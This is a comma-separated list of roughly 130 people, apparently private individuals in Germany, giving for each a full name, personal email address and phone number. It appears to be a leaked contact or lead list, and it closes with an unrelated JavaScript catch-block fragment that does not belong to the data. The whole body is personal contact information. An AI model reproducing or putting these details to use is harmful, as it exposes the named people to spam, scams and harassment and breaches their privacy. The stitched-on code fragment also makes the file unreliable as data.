Armin,Staender,arminstaender@gmx.de,Germany,(49173) 613-9606
Michael,Dinse,michaeldinse@gmx.de,Germany,(49173) 349-3743
Alexander,Degenstein,a.degenstein@gmx.de,Germany,(49171) 700-0000
Heiko,Lasch,heikosnews@gmx.de,Germany,(49305) 106-6030
Andreas,Hein,byteorder@me.com,Germany,(49656) 194-1084
Gerhard,Lungershausen,ompoa1@yahoo.de,Germany,(49360) 383-0550
Robert,Kluge,hopper_1@web.de,Germany,(49173) 341-1671
Francoise,Lhote,flhote@gmx.de,Germany,(49691) 751-3975
Karsten,Klimek,denham@gmx.de,Germany,(49691) 534-9778
Nikolas,Drangenstein,drangenstein@googlemail.com,Germany,(4906) 963-6631
Wolfgang,Zipp,wolfgang.zipp@t-online.de,Germany,(4963) 537-3633
Dumitru,Liviu,liviu-dumitru@t-online.de,Germany,(4913) 435-6678
Roy,Almagor,royalg006@mailinator.com,Germany,(4933) 433-4334
Friedrich,Becker,becker-ense@unitybox.de,Germany,(4903) 938-1335
Stefan,Mauss,mauss@t-online.de,Germany,(4951) 131-3407
Florian,Fornoff,daytradecentral@gmail.com,Germany,(4916) 133-1546
Julian,Strobl,julian.strobl@gmx.de,Germany,(491511) 530-9199
Sascha,Berg,sascha-berg@gmx.de,Germany,(49171) 796-3838
Hani,Basta,hany.p@gmx.de,Germany,(4901578) 764-8680
Klaus,Scharf,k.scharf@ksmd.de,Germany,(49391) 633-9143
Georg,Klotzsche,klotzschi@googlemail.com,Germany,(49353485) 697-4659
Udoh,Ini,mybyte3003@yahoo.de,Germany,(490176) 000-0000
Marc Oliver,Lesch,oliverundhannah@gmx.de,Germany,(491535) 333-9833
Dennis,David,dennisdavid92@gmx.de,Germany,(491575) 586-1162
Britt,Bremer,hauswartservice-bremer@t-online.de,Germany,(49160) 530-9072
Romy,Olczyk,Olczyk.romy@web.de,Germany,(49175) 197-4039
Beate,Brunner,be-brunner@t-online.de,Germany,(4920) 562-8537
Max,Berman,mackyjones@gmail.com,Germany,(491577) 729-0261
Timo,Vock,timo.vock@gmail.com,Germany,(49178) 187-5240
Karl- Heinz ,Belter ,karl-heinz-belter@t-online.de,Germany,(49366) 340-3179
Anton,Nagy,tonio13@web.de,Germany,(49696) 530-1656
Halil,Hajredini,halilhajredini@hotmail.de,Germany,(491609) 484-4694
Patrick,Koopman,koopmanp@yahoo.com,Germany,(491511) 083-2740
Thomas,Hynek,thomashynek29@yahoo.de,Germany,(491520) 884-6071
Alexej,Maljas,alexej-maljas@live.com,Germany,(491515) 403-0806
Arne,Schrey,schrey75@gnx.net,Germany,(491515) 984-3823
Gerhard,Will,Roy-Rogers@t-online.de,Germany,(499383) 903-8762
Egbert,Post,carshipcorp@gmail.com,Germany,(491765) 336-9743
Reinhard,Pfeiffer,r.peiffer@tele2.de,Germany,(49357) 197-5000
Ulrich,Schirpenbach,uli.schirpenbach@gmx.de,Germany,(49174) 207-0676
Erika,Werner,erika.werner3110@t-online.de,Germany,(49160) 356-4306
Michael,Kainz,milchkuh67@gmail.com,Germany,(491577) 493-4720
peter,h.,peter@byom.de,Germany,(491234) 525-6695
Heiko,Kubik,heiko0311@hotmail.de,Germany,(491522) 721-3671
Nandor,Cernus,nandorcernus@t-online.de,Germany,(492104) 138-5910
Frank,Zimmermann,fzm2000@web.de,Germany,(49178) 936-6933
Janett,Roek,nette81@hotmail.de,Germany,(491522) 293-1596
Ingo,Pavka,ingo.pavka@gmx.de,Germany,(49175) 202-8592
Peter,Sommer,Exensommer@web.de,Germany,(491522) 766-1195
Uwe,Krause,u.krause05@gmail.com,Germany,(491522) 928-3388
Goscha,Muller,Schmidt.johann1986@web.de,Germany,(49174) 608-2087
Bilstein,Struppek,bilsteinstruppek@outlook.com,Germany,(491512) 576-6113
Susanne,Stuckert,susi.stuckert47@gmail.com,Germany,(491763) 017-2977
Christos,Kotrotsios,chriscross72@web.de,Germany,ERR
Robert ,Kress ,robertkress@gmx.de,Germany,(49171) 380-8757
Bilgehan ,Bekki ,bilgehan_bekki@live.de,Germany,(49176) 471-6508
Heinrich,Ditel,hdjobber@gmail.com,Germany,(497232) 308-0820
Andy,Waclawczyk,pulpduisburg@gmx.de,Germany,(49160) 857-3872
Nico,Flanz,n.mueller5@web.de,Germany,(49385) 488-5955
Hermann,Schonrock,Hermannsch@gmx.de,Germany,(492091) 497-0409
Thoralf,Backer,thoralf.baecker@web.de,Germany,(491512) 017-0064
INGRID,TEWES,at-networking@web.de,Germany,(496343) 617-9284
Petra,Stockdteher,petrastockdreher75@gmail.com,Germany,(49162) 825-4957
Thomas,Kosziolleck,Thonet36@googlemail.com,Germany,(49175) 443-7482
Tuschkowski,Yvonne,y.tuschkowski@web.de,Germany,(49177) 667-7799
Juan Carlos,Schmidt Yanes,laeolicasalvaravidas@web.de,Germany,(491577) 851-6554
Kurt,Kahlke,kahlke.spo@gmail.com,Germany,(49170) 937-2893
Gerhard,Trefzer,ib.trefzer@web.de,Germany,(49781) 919-3194
Sven Martin,Schmidt,svenms1981@gmail.com,Germany,(491590) 130-7890
David,Brooks,david.brooks.trade@gmail.com,Germany,(491525) 195-2497
Peter,Heinrich,Pero-2002tii@gmx.de,Germany,(491762) 769-2081
Kerstin,Galander,mokka-mich-eisbar@t-online.de,Germany,(491577) 572-5993
katja,schwalbe,philweisse@gmx.de,Germany,(49174) 589-2454
Wolfgang Glock,Glock,thg-glock@t-online.de,Germany,(49171) 427-3706
Arno,Preis,arnopreis54@gmail.com,Germany,(49171) 141-1271
Volker,Lobbes,lobbes@hotmail.de,Germany,(491525) 341-4643
Andreas,Wittmann,ultimate_post@yahoo.com,Germany,(49173) 716-1323
Karin ,Jung,karl-jung52@hotmail.com,Germany,(491573) 170-2027
hanspeter,kiendl,1965fm@web.de,Germany,(4994) 314-2811
Kevin,Kretschmann ,kevin-kretschmann@web.de,Germany,(491573) 437-2831
Otar,maisuradze,ota-mais@yandex.ru,Germany,(491766) 331-0359
Marko,Anicic,anicic83@gmail.com,Germany,(491522) 467-8865
Steffen,Nitzschner,nitzschner-sf@gmx.de,Germany,(49163) 735-8914
Ralf,Slembek,ralf.slembek@online.de,Germany,(49170) 828-2217
Dieter,Lasshofer,dlasshofer@arcor.de,Germany,(493615) 188-3600
Florian,Wacker,wacker83193@gmail.com,Germany,(491525) 398-6938
Alexander,Schirdewahn ,alexanderschirde@gmail.com,Germany,(491767) 267-6394
Ralph,Hensel,ralph.hensel@gmx.de,Germany,(49359) 127-0573
Thomas,Link,linktkh@o2online.de,Germany,(498519) 885-9901
Angelika Fischer,Fischer,af1962@t-online.de,Germany,(492335) 844-7222
Juergen,Zschech,jzschech@gmx.de,Germany,(49172) 707-0749
Wolfgang,Westphal,stausee@gmx.de,Germany,(491762) 159-8065
Darko,Bilav,nikolinabilav@icloud.com,Germany,(49163) 574-7412
christian,eichhorn,eichel240@gmail.com,Germany,(49171) 622-5785
manfred,back,meinback@ish.de,Germany,(491764) 336-7909
Ekkehard,Westphal,ekkehardwestphal@gmx.de,Germany,(49422) 294-7553
mayelin,Acosta,a_mayelin23@yahoo.com,Germany,(491512) 255-8380
Wil,Thoms,w.thoms@web.de,Germany,(491051) 140-2342
Uwe Sinn,Sinn,u.sinn@gmx.de,Germany,(4971) 342-2807
David,Wei,weissdvd@gmail.com,Germany,(491523) 693-3722
Christian,Hartmann,chrisnew2022@gmail.com,Germany,(49174) 763-4541
Benjamin ,Sorg,sorg.benny@gmail.com,Germany,(49175) 783-1988
Otto,Engel,ottoengel1987@gmail.com,Germany,(49160) 283-7724
Justin ,Neuhaus ,Jneuhaus92@gmail.com,Germany,(49177) 186-8247
alexander,tews,vip.tews@list.ru,Germany,(491762) 151-3131
Ludwig,Scholl,schoell-osi@t-online.de,Germany,(49917) 996-3802
Evita,Leonhardt,evita.leonhardt@icloud.com,Germany,(49) 847-3950
werner,friedrich,friedschnurzel@freenet.de,Germany,(49332) 075-0878
Andreas,Rippin,andreasrippin@hotmail.com,Germany,(491575) 409-8266
thomas,Hanf,hanfthomas42@gmail.com,Germany,(491525) 698-6179
Herro,Herin,Herro@mail.de,Germany,(4930) 241-5889
michael,Belz,belzmichi@gmail.com,Germany,(49170) 303-1627
Peggy,Mundt,peggymundt74.p.m@gmail.com,Germany,(49162) 872-7235
Jens ,Schwieger ,jens-schwieger@web.de,Germany,(49174) 174-9935
Lets ,Sell ,letssell123@gmx.de,Germany,(491522) 939-8382
Stefan,Fust,info@elektro-fust.fe,Germany,(49171) 720-8113
Werner,Herold,werner.herold@vkkl.de,Germany,(49171) 622-5785
Kevin,Engler,kevin-engler@gmx.de,Germany,(49162) 746-3275
Otto,Heise,otto_heise@web.de,Germany,(491523) 369-0995
qadeer,javed,nehanqadeer2@gmail.com,Germany,(491521) 712-8881
Zueleha,Lekesiz,lekesiz672@gmail.com,Germany,(49173) 734-6040
Johann,Gruber,johanngruber@mail.de,Germany,(491522) 276-2116
Ahmed,Krouma,afr2003k@freenet.de,Germany,(49219) 146-2516
Julitta,karnagel,julittakarnagel@aol.com,Germany,(4915200) 684-2554
Kevin,Kubler,masterKevin1991@web.de,Germany,(491522) 357-6491

} catch (e) {
  app.alert(e.message);
}